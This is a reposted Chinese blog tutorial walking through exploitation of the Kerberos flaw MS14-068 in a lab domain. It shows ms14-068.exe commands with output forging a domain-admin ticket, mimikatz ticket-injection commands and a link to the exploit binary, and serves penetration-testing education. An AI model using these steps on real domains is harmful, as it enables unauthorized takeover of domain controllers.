日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

域渗透提权之MS14-068

發布時間:2023/11/27 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 域渗透提权之MS14-068 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0x00 前言


在做滲透測試時,當遇到域環境,獲取到一個域成員賬號后,如果域控制器未打好補丁,則可以利用本文所提到的漏洞,快速獲取到域控制器權限。筆者這里總結網上已有資料,加以描述,希望你能在實際測試中派上用場。

0x01 準備工作


  1. 域成員賬號及密碼一個
  2. mimikatz
  3. ms14-068.exe
  4. 03以上服務器或pc

0x02 模擬環境


域控制器 2008r2 dc.test.com 192.168.3.100
域內機器 2008r2 client.test.com 192.168.3.10

0x03 漏洞自檢


MS14-068編號CVE-2014-6324,補丁為3011780,如果自檢可在域控制器上使用命令檢測

systeminfo |find "3011780"

為空則代表沒有打該補丁,存在漏洞!
如果屬于黑盒測試,并沒有直接操作域控制器的權限,那么只能使用該漏洞,看是否能成功偽造域管理員登錄來驗證

0x04 漏洞利用


1. 獲取域成員sid

獲取域成員sid的方式有多種,當然前提是建立在0x01上,本次使用最為簡單的命令獲取

whoami /all  #該命令獲取當前登錄用戶的信息,這里使用的是域成員登錄,所以獲取到的是域成員normal的sid

2. 生成TGT票據

使用ms14-068.exe,網上有多種版本,有python腳本(需要在***機上安裝python2.x版本,略麻煩),也有已經從python轉exe的版本,不需要依賴python環境,下載地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

C:\Users\normal\Desktop>MS14-068.exe
USAGE:
MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>OPTIONS:-p <clearPassword>--rc4 <ntlmHash>C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3
818689962-3591297438-1105 -d 192.168.3.100 -p Server1[+] Building AS-REQ for 192.168.3.100... Done![+] Sending AS-REQ to 192.168.3.100... Done![+] Receiving AS-REP from 192.168.3.100... Done![+] Parsing AS-REP from 192.168.3.100... Done![+] Building TGS-REQ for 192.168.3.100... Done![+] Sending TGS-REQ to 192.168.3.100... Done![+] Receiving TGS-REP from 192.168.3.100... Done![+] Parsing TGS-REP from 192.168.3.100... Done![+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!使用方法:
ms14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼

如果操作正確,且域機器是可以和域控制器互通則會創建.ccache文件

域成員密碼錯誤情況圖

3. 票據注入

使用mimikatz將票據注入到當前內存中,偽造憑證,如果成功則擁有域管理權限,可任意訪問域中所有機器

mimikatz # kerberos::purge      //清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造
mimikatz # kerberos::list          //查看當前機器憑證
mimikatz # kerberos::ptc 票據文件         //將票據注入到內存中


當顯示injecting ticket ok時,表示已經成功將票據注入到內存中,可在機器中用klist查看

4.測試

偽造后,進行嘗試訪問域控制器

注入票據前是不能訪問的

0x05 細節


  1. 注入票據時,機器不能是03或xp,因為mimikatz不支持這兩個機器注入,聽大佬說過有工具可以注入,希望有知道的朋友可以留言

  2. 當獲取到域用戶、域用戶sid、密碼以及可訪問到域控制器的機器,并不需要機器一定在域中(如***者通過***等撥入內網),但需要把dns指向域控制器才能解析
  3. 訪問域控制器時,需要使用主機名,不能使用ip
  4. 如有錯誤,請指正,萬分感謝

?轉發:https://blog.51cto.com/z2ppp/2060051

總結

以上是生活随笔為你收集整理的域渗透提权之MS14-068的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

歡迎分享!

轉載請說明來源于"生活随笔",并保留原作者的名字。

本文地址:域渗透提权之MS14-068